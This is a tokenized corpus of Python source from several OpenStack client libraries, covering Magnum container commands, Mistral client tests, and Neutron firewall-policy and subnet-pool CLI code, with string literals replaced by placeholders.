<EOL> def test_args_array_to_patch_remove ( self ) : <EOL> my_args = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> patch = utils . args_array_to_patch ( my_args [ '<STR_LIT>' ] , <EOL> my_args [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:path>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:path>' : '<STR_LIT>' } ] , patch ) <EOL> class FormatLabelsTest ( test_utils . BaseTestCase ) : <EOL> def test_format_label_none ( self ) : <EOL> self . assertEqual ( { } , utils . format_labels ( None ) ) <EOL> def test_format_labels ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , l ) <EOL> def test_format_labels_semicolon ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , l ) <EOL> def test_format_labels_mix_commas_semicolon ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , l ) <EOL> def test_format_labels_split ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , l ) <EOL> def test_format_labels_multiple ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , l ) <EOL> def test_format_labels_multiple_colon_values ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , l ) <EOL> def test_format_labels_parse_comma_false ( self ) : <EOL> l = utils . format_labels ( <EOL> [ '<STR_LIT>' ] , <EOL> parse_comma = False ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' } , l ) <EOL> def test_format_labels_multiple_values_per_labels ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , l ) <EOL> self . assertIn ( '<STR_LIT>' , l [ '<STR_LIT>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , l [ '<STR_LIT>' ] ) <EOL> def test_format_label_bad_label ( self ) : <EOL> labels = [ '<STR_LIT>' ] <EOL> ex = self . assertRaises ( exc . CommandError , <EOL> utils . format_labels , labels ) <EOL> self . assertEqual ( '<STR_LIT>' <EOL> '<STR_LIT>' , str ( ex ) ) <EOL> def test_format_multiple_bad_label ( self ) : <EOL> labels = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ex = self . assertRaises ( exc . CommandError , <EOL> utils . format_labels , labels ) <EOL> self . assertEqual ( '<STR_LIT>' <EOL> '<STR_LIT>' , str ( ex ) ) <EOL> class CliUtilsTest ( test_utils . BaseTestCase ) : <EOL> def test_keys_and_vals_to_strs ( self ) : <EOL> dict_in = { six . u ( '<STR_LIT:a>' ) : six . u ( '<STR_LIT:1>' ) , <EOL> six . u ( '<STR_LIT:b>' ) : { six . u ( '<STR_LIT:x>' ) : <NUM_LIT:1> , <EOL> '<STR_LIT:y>' : six . u ( '<STR_LIT:2>' ) , <EOL> six . u ( '<STR_LIT:z>' ) : six . u ( '<STR_LIT:3>' ) } , <EOL> '<STR_LIT:c>' : <NUM_LIT:7> } <EOL> dict_exp = collections . OrderedDict ( [ <EOL> ( '<STR_LIT:a>' , '<STR_LIT:1>' ) , <EOL> ( '<STR_LIT:b>' , collections . OrderedDict ( [ <EOL> ( '<STR_LIT:x>' , <NUM_LIT:1> ) , <EOL> ( '<STR_LIT:y>' , '<STR_LIT:2>' ) , <EOL> ( '<STR_LIT:z>' , '<STR_LIT:3>' ) ] ) ) , <EOL> ( '<STR_LIT:c>' , <NUM_LIT:7> ) ] ) <EOL> dict_out = cliutils . keys_and_vals_to_strs ( dict_in ) <EOL> dict_act = collections . OrderedDict ( [ <EOL> ( '<STR_LIT:a>' , dict_out [ '<STR_LIT:a>' ] ) , <EOL> ( '<STR_LIT:b>' , collections . OrderedDict ( sorted ( dict_out [ '<STR_LIT:b>' ] . items ( ) ) ) ) , <EOL> ( '<STR_LIT:c>' , dict_out [ '<STR_LIT:c>' ] ) ] ) <EOL> self . assertEqual ( six . text_type ( dict_exp ) , six . text_type ( dict_act ) ) </s>
<s> import json <EOL> from magnumclient . common import cliutils as utils <EOL> from magnumclient . common import utils as magnum_utils <EOL> from magnumclient import exceptions <EOL> def _show_container ( container ) : <EOL> utils . print_dict ( container . _info ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> required = True , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> required = True , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def do_container_create ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> bay = cs . bays . get ( args . bay ) <EOL> if bay . status not in [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise exceptions . InvalidAttribute ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( bay . uuid , bay . status , "<STR_LIT>" ) ) <EOL> return <EOL> opts = { } <EOL> opts [ '<STR_LIT:name>' ] = args . name <EOL> opts [ '<STR_LIT:image>' ] = args . image <EOL> opts [ '<STR_LIT>' ] = bay . uuid <EOL> opts [ '<STR_LIT>' ] = args . command <EOL> opts [ '<STR_LIT>' ] = args . memory <EOL> _show_container ( cs . containers . create ( ** opts ) ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> type = int , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> choices = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> def do_container_list ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> opts = { } <EOL> opts [ '<STR_LIT>' ] = args . bay <EOL> opts [ '<STR_LIT>' ] = args . marker <EOL> opts [ '<STR_LIT>' ] = args . limit <EOL> opts [ '<STR_LIT>' ] = args . sort_key <EOL> opts [ '<STR_LIT>' ] = args . sort_dir <EOL> containers = cs . containers . list ( ** opts ) <EOL> columns = ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT:status>' , '<STR_LIT>' ) <EOL> utils . print_list ( containers , columns , <EOL> { '<STR_LIT>' : magnum_utils . print_list_field ( '<STR_LIT>' ) } , <EOL> sortby_index = None ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_delete ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> for container in args . containers : <EOL> try : <EOL> cs . containers . delete ( container ) <EOL> print ( "<STR_LIT>" % <EOL> container ) <EOL> except Exception as e : <EOL> print ( "<STR_LIT>" % <EOL> { '<STR_LIT>' : container , '<STR_LIT:e>' : e } ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_show ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> container = cs . containers . get ( args . container ) <EOL> if args . json : <EOL> print ( json . dumps ( container . _info ) ) <EOL> else : <EOL> _show_container ( container ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_reboot ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> for container in args . containers : <EOL> try : <EOL> cs . containers . reboot ( container ) <EOL> except Exception as e : <EOL> print ( "<STR_LIT>" % <EOL> { '<STR_LIT>' : container , '<STR_LIT:e>' : e } ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_stop ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> for container in args . containers : <EOL> try : <EOL> cs . containers . stop ( container ) <EOL> except Exception as e : <EOL> print ( "<STR_LIT>" % <EOL> { '<STR_LIT>' : container , '<STR_LIT:e>' : e } ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_start ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> for container in args . containers : <EOL> try : <EOL> cs . containers . start ( container ) <EOL> except Exception as e : <EOL> print ( "<STR_LIT>" % <EOL> { '<STR_LIT>' : container , '<STR_LIT:e>' : e } ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_pause ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> for container in args . containers : <EOL> try : <EOL> cs . containers . pause ( container ) <EOL> except Exception as e : <EOL> print ( "<STR_LIT>" % <EOL> { '<STR_LIT>' : container , '<STR_LIT:e>' : e } ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_unpause ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> for container in args . containers : <EOL> try : <EOL> cs . containers . unpause ( container ) <EOL> except Exception as e : <EOL> print ( "<STR_LIT>" % <EOL> { '<STR_LIT>' : container , '<STR_LIT:e>' : e } ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_logs ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> logs = cs . containers . logs ( args . container ) <EOL> print ( logs ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> required = True , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_exec ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> output = cs . containers . execute ( args . container , args . command ) <EOL> print ( output ) </s>
<s> import abc <EOL> import textwrap <EOL> from cliff import lister <EOL> import six <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class MistralLister ( lister . Lister ) : <EOL> @ abc . abstractmethod <EOL> def _get_format_function ( self ) : <EOL> raise NotImplementedError <EOL> @ abc . abstractmethod <EOL> def _get_resources ( self , parsed_args ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def _validate_parsed_args ( self , parsed_args ) : <EOL> pass <EOL> def take_action ( self , parsed_args ) : <EOL> self . _validate_parsed_args ( parsed_args ) <EOL> f = self . _get_format_function ( ) <EOL> ret = self . _get_resources ( parsed_args ) <EOL> if not isinstance ( ret , list ) : <EOL> ret = [ ret ] <EOL> data = [ f ( r ) [ <NUM_LIT:1> ] for r in ret ] <EOL> if data : <EOL> return f ( ) [ <NUM_LIT:0> ] , data <EOL> else : <EOL> return f ( ) <EOL> def cut ( string , length = <NUM_LIT> ) : <EOL> if string and len ( string ) > length : <EOL> return "<STR_LIT>" % string [ : length ] <EOL> else : <EOL> return string <EOL> def wrap ( string , width = <NUM_LIT> ) : <EOL> if string and len ( string ) > width : <EOL> return textwrap . fill ( string , width ) <EOL> else : <EOL> return string </s>
<s> import os <EOL> import tempfile <EOL> import uuid <EOL> import mock <EOL> import testtools <EOL> from mistralclient . api import client <EOL> AUTH_HTTP_URL = '<STR_LIT>' <EOL> AUTH_HTTPS_URL = AUTH_HTTP_URL . replace ( '<STR_LIT:http>' , '<STR_LIT>' ) <EOL> MISTRAL_HTTP_URL = '<STR_LIT>' <EOL> MISTRAL_HTTPS_URL = MISTRAL_HTTP_URL . replace ( '<STR_LIT:http>' , '<STR_LIT>' ) <EOL> class BaseClientTests ( testtools . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_mistral_url_default ( self , mock , keystone_client_mock ) : <EOL> keystone_client_instance = keystone_client_mock . return_value <EOL> keystone_client_instance . auth_token = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . project_id = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . user_id = str ( uuid . uuid4 ( ) ) <EOL> expected_args = ( <EOL> MISTRAL_HTTP_URL , <EOL> keystone_client_instance . auth_token , <EOL> keystone_client_instance . project_id , <EOL> keystone_client_instance . user_id <EOL> ) <EOL> expected_kwargs = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False <EOL> } <EOL> client . client ( <EOL> username = '<STR_LIT>' , <EOL> project_name = '<STR_LIT>' , <EOL> auth_url = AUTH_HTTP_URL <EOL> ) <EOL> self . assertTrue ( mock . called ) <EOL> self . assertEqual ( mock . call_args [ <NUM_LIT:0> ] , expected_args ) <EOL> self . assertDictEqual ( mock . call_args [ <NUM_LIT:1> ] , expected_kwargs ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_mistral_url_https_insecure ( self , mock , keystone_client_mock ) : <EOL> keystone_client_instance = keystone_client_mock . return_value <EOL> keystone_client_instance . auth_token = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . project_id = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . user_id = str ( uuid . uuid4 ( ) ) <EOL> expected_args = ( <EOL> MISTRAL_HTTPS_URL , <EOL> keystone_client_instance . auth_token , <EOL> keystone_client_instance . project_id , <EOL> keystone_client_instance . user_id <EOL> ) <EOL> expected_kwargs = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True <EOL> } <EOL> client . client ( <EOL> mistral_url = MISTRAL_HTTPS_URL , <EOL> username = '<STR_LIT>' , <EOL> project_name = '<STR_LIT>' , <EOL> auth_url = AUTH_HTTP_URL , <EOL> cacert = None , <EOL> insecure = True <EOL> ) <EOL> self . assertTrue ( mock . called ) <EOL> self . assertEqual ( mock . call_args [ <NUM_LIT:0> ] , expected_args ) <EOL> self . assertDictEqual ( mock . call_args [ <NUM_LIT:1> ] , expected_kwargs ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_mistral_url_https_secure ( self , mock , keystone_client_mock ) : <EOL> fd , path = tempfile . mkstemp ( suffix = '<STR_LIT>' ) <EOL> keystone_client_instance = keystone_client_mock . return_value <EOL> keystone_client_instance . auth_token = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . project_id = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . user_id = str ( uuid . uuid4 ( ) ) <EOL> expected_args = ( <EOL> MISTRAL_HTTPS_URL , <EOL> keystone_client_instance . auth_token , <EOL> keystone_client_instance . project_id , <EOL> keystone_client_instance . user_id <EOL> ) <EOL> expected_kwargs = { <EOL> '<STR_LIT>' : path , <EOL> '<STR_LIT>' : False <EOL> } <EOL> try : <EOL> client . client ( <EOL> mistral_url = MISTRAL_HTTPS_URL , <EOL> username = '<STR_LIT>' , <EOL> project_name = '<STR_LIT>' , <EOL> auth_url = AUTH_HTTP_URL , <EOL> cacert = path , <EOL> insecure = False <EOL> ) <EOL> finally : <EOL> os . close ( fd ) <EOL> os . unlink ( path ) <EOL> self . assertTrue ( mock . called ) <EOL> self . assertEqual ( mock . call_args [ <NUM_LIT:0> ] , expected_args ) <EOL> self . assertDictEqual ( mock . call_args [ <NUM_LIT:1> ] , expected_kwargs ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_mistral_url_https_bad_cacert ( self , keystone_client_mock ) : <EOL> keystone_client_instance = keystone_client_mock . return_value <EOL> keystone_client_instance . auth_token = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . project_id = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . user_id = str ( uuid . uuid4 ( ) ) <EOL> self . assertRaises ( <EOL> ValueError , <EOL> client . client , <EOL> mistral_url = MISTRAL_HTTPS_URL , <EOL> username = '<STR_LIT>' , <EOL> project_name = '<STR_LIT>' , <EOL> auth_url = AUTH_HTTP_URL , <EOL> cacert = '<STR_LIT>' , <EOL> insecure = False <EOL> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_mistral_url_https_bad_insecure ( self , keystone_client_mock , <EOL> log_warning_mock ) : <EOL> fd , path = tempfile . mkstemp ( suffix = '<STR_LIT>' ) <EOL> keystone_client_instance = keystone_client_mock . return_value <EOL> keystone_client_instance . auth_token = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . project_id = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . user_id = str ( uuid . uuid4 ( ) ) <EOL> try : <EOL> client . client ( <EOL> mistral_url = MISTRAL_HTTPS_URL , <EOL> username = '<STR_LIT>' , <EOL> project_name = '<STR_LIT>' , <EOL> auth_url = AUTH_HTTP_URL , <EOL> cacert = path , <EOL> insecure = True <EOL> ) <EOL> finally : <EOL> os . close ( fd ) <EOL> os . unlink ( path ) <EOL> self . assertTrue ( log_warning_mock . called ) </s>
<s> from monascaclient . common import utils <EOL> def Client ( version , * args , ** kwargs ) : <EOL> module = utils . import_versioned_module ( version , '<STR_LIT>' ) <EOL> client_class = getattr ( module , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in kwargs and kwargs [ '<STR_LIT>' ] : <EOL> utils . set_env_variables ( kwargs ) <EOL> return client_class ( * args , ** kwargs ) </s>
<s> project = '<STR_LIT>' <EOL> extensions = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> copyright = u'<STR_LIT>' <EOL> add_function_parentheses = True <EOL> add_module_names = True <EOL> pygments_style = '<STR_LIT>' <EOL> htmlhelp_basename = '<STR_LIT>' % project <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , <EOL> '<STR_LIT>' % project , <EOL> u'<STR_LIT>' % project , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] </s>
<s> from __future__ import print_function <EOL> import argparse <EOL> from neutronclient . _i18n import _ <EOL> from neutronclient . common import utils <EOL> from neutronclient . neutron import v2_0 as neutronv20 <EOL> def _format_firewall_rules ( firewall_policy ) : <EOL> try : <EOL> output = '<STR_LIT:[>' + '<STR_LIT>' . join ( [ rule for rule in <EOL> firewall_policy [ '<STR_LIT>' ] ] ) + '<STR_LIT:]>' <EOL> return output <EOL> except ( TypeError , KeyError ) : <EOL> return '<STR_LIT>' <EOL> def add_common_args ( parser ) : <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , type = lambda x : x . split ( ) , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def parse_common_args ( client , parsed_args ) : <EOL> if parsed_args . firewall_rules : <EOL> _firewall_rules = [ ] <EOL> for f in parsed_args . firewall_rules : <EOL> _firewall_rules . append ( <EOL> neutronv20 . find_resourceid_by_name_or_id ( <EOL> client , '<STR_LIT>' , f ) ) <EOL> body = { '<STR_LIT>' : _firewall_rules } <EOL> else : <EOL> body = { } <EOL> neutronv20 . update_dict ( parsed_args , body , <EOL> [ '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return { '<STR_LIT>' : body } <EOL> class ListFirewallPolicy ( neutronv20 . ListCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> list_columns = [ '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT>' ] <EOL> _formatters = { '<STR_LIT>' : _format_firewall_rules , <EOL> } <EOL> pagination_support = True <EOL> sorting_support = True <EOL> class ShowFirewallPolicy ( neutronv20 . ShowCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> class CreateFirewallPolicy ( neutronv20 . CreateCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> def add_known_arguments ( self , parser ) : <EOL> parser . add_argument ( <EOL> '<STR_LIT:name>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = _ ( '<STR_LIT>' ) , <EOL> default = argparse . SUPPRESS ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = _ ( '<STR_LIT>' ) , <EOL> default = argparse . SUPPRESS ) <EOL> add_common_args ( parser ) <EOL> def args2body ( self , parsed_args ) : <EOL> return parse_common_args ( self . get_client ( ) , parsed_args ) <EOL> class UpdateFirewallPolicy ( neutronv20 . UpdateCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> def add_known_arguments ( self , parser ) : <EOL> add_common_args ( parser ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> utils . add_boolean_argument ( <EOL> parser , '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> utils . add_boolean_argument ( <EOL> parser , '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def args2body ( self , parsed_args ) : <EOL> return parse_common_args ( self . get_client ( ) , parsed_args ) <EOL> class DeleteFirewallPolicy ( neutronv20 . DeleteCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> class FirewallPolicyInsertRule ( neutronv20 . UpdateCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> def call_api ( self , neutron_client , firewall_policy_id , body ) : <EOL> return neutron_client . firewall_policy_insert_rule ( firewall_policy_id , <EOL> body ) <EOL> def args2body ( self , parsed_args ) : <EOL> _rule = '<STR_LIT>' <EOL> if parsed_args . firewall_rule_id : <EOL> _rule = neutronv20 . find_resourceid_by_name_or_id ( <EOL> self . get_client ( ) , '<STR_LIT>' , <EOL> parsed_args . firewall_rule_id ) <EOL> _insert_before = '<STR_LIT>' <EOL> if '<STR_LIT>' in parsed_args : <EOL> if parsed_args . insert_before : <EOL> _insert_before = neutronv20 . find_resourceid_by_name_or_id ( <EOL> self . get_client ( ) , '<STR_LIT>' , <EOL> parsed_args . insert_before ) <EOL> _insert_after = '<STR_LIT>' <EOL> if '<STR_LIT>' in parsed_args : <EOL> if parsed_args . insert_after : <EOL> _insert_after = neutronv20 . find_resourceid_by_name_or_id ( <EOL> self . get_client ( ) , '<STR_LIT>' , <EOL> parsed_args . insert_after ) <EOL> body = { '<STR_LIT>' : _rule , <EOL> '<STR_LIT>' : _insert_before , <EOL> '<STR_LIT>' : _insert_after } <EOL> return body <EOL> def get_parser ( self , prog_name ) : <EOL> parser = super ( FirewallPolicyInsertRule , self ) . get_parser ( prog_name ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> self . add_known_arguments ( parser ) <EOL> return parser <EOL> def take_action ( self , parsed_args ) : <EOL> neutron_client = self . get_client ( ) <EOL> body = self . args2body ( parsed_args ) <EOL> _id = neutronv20 . find_resourceid_by_name_or_id ( neutron_client , <EOL> self . resource , <EOL> parsed_args . id ) <EOL> self . call_api ( neutron_client , _id , body ) <EOL> print ( ( _ ( '<STR_LIT>' ) % <EOL> { '<STR_LIT:id>' : parsed_args . id } ) , file = self . app . stdout ) <EOL> class FirewallPolicyRemoveRule ( neutronv20 . UpdateCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> def call_api ( self , neutron_client , firewall_policy_id , body ) : <EOL> return neutron_client . firewall_policy_remove_rule ( firewall_policy_id , <EOL> body ) <EOL> def args2body ( self , parsed_args ) : <EOL> _rule = '<STR_LIT>' <EOL> if parsed_args . firewall_rule_id : <EOL> _rule = neutronv20 . find_resourceid_by_name_or_id ( <EOL> self . get_client ( ) , '<STR_LIT>' , <EOL> parsed_args . firewall_rule_id ) <EOL> body = { '<STR_LIT>' : _rule } <EOL> return body <EOL> def get_parser ( self , prog_name ) : <EOL> parser = super ( FirewallPolicyRemoveRule , self ) . get_parser ( prog_name ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> self . add_known_arguments ( parser ) <EOL> return parser <EOL> def take_action ( self , parsed_args ) : <EOL> neutron_client = self . get_client ( ) <EOL> body = self . args2body ( parsed_args ) <EOL> _id = neutronv20 . find_resourceid_by_name_or_id ( neutron_client , <EOL> self . resource , <EOL> parsed_args . id ) <EOL> self . call_api ( neutron_client , _id , body ) <EOL> print ( ( _ ( '<STR_LIT>' ) % <EOL> { '<STR_LIT:id>' : parsed_args . id } ) , file = self . app . stdout ) </s>
<s> from neutronclient . _i18n import _ <EOL> from neutronclient . common import utils <EOL> from neutronclient . neutron import v2_0 as neutronV20 <EOL> def _format_prefixes ( subnetpool ) : <EOL> try : <EOL> return '<STR_LIT:\n>' . join ( pool for pool in subnetpool [ '<STR_LIT>' ] ) <EOL> except ( TypeError , KeyError ) : <EOL> return subnetpool [ '<STR_LIT>' ] <EOL> def add_updatable_arguments ( parser , for_create = False ) : <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , type = int , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , type = int , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , type = int , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = for_create , <EOL> help = _ ( 